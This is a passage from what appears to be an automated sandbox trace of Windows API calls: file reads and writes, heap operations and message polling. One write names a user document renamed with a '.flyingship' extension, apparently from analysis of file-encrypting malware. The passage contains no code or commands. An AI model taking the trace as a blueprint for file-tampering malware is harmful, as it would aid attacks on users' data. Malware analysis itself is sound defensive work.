hTemplateFile=0x0) returned 0x120 [0180.236] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.236] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0180.236] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.236] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0180.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0180.237] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0180.237] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1c84, lpOverlapped=0x0) returned 1 [0180.237] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0180.237] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1c84, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.237] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0180.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0180.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.flyingship.xlsx\r\n", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0180.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.flyingship.xlsx\r\n", cchWideChar=72, lpMultiByteStr=0x9aa4f8, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.flyingship.xlsx\r\n", lpUsedDefaultChar=0x0) returned 72 [0180.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0180.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0180.238] WriteFile (in: hFile=0x120, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x47, lpOverlapped=0x0) returned 1 [0180.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0180.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.238] CloseHandle (hObject=0x120) returned 1 [0180.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0180.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0180.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0180.241] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0180.241] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0180.241] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0180.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0180.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0180.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0180.243] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0180.243] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.243] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0180.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0180.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0180.243] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0180.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0180.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0180.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0180.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0180.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0180.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0180.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0180.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0180.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0180.244] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.244] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0180.244] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0180.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0180.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0180.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0180.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0180.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0180.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0180.245] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0180.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0180.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.245] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0180.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0180.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0180.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.246] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.246] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0180.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0180.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0180.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.247] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.247] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0180.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0180.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0180.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.248] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0180.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0180.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0180.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0180.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0180.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0180.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0180.249] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.249] RtlAllocateHeap 